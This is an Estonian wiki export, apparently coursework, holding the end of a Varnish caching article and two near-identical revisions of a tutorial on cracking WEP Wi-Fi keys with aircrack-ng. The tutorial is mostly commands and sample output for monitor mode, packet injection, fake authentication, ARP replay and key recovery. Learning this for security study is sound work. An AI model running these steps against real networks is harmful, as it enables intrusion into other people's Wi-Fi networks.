Varnishi abil on võimalik suht triviaalselt täiendada oma veebiserveri kiirust, mis on tänapäeval kindlasti üks väga tähtis korraliku veebiteenuse loomisel.

Kui pisut süveneda VCL süntaksisse ja väga loetavasse dokumentatsiooni<ref>[https://www.varnish-cache.org/docs Varnish Docs]</ref> on võimalik ilma lisa programmideta, nagu näiteks [[modsecurity]], tuua sisse tulemüüri funktsioone. Kindlasti tasub uurida ka Varnishi enda wikit<ref>[https://www.varnish-cache.org/trac/ Varnish wiki]</ref>, kust võib leida ka VCL näitefaile, mida on rakendatud ''production'' süsteemides, mille pealt tasub šnitti võtta.

==Viited==
<references />

Aircrack

2015-05-25T20:24:39Z

Ktragel: /* Eeldused */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T20:13:50Z

Ktragel: /* Kokkuvõte */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

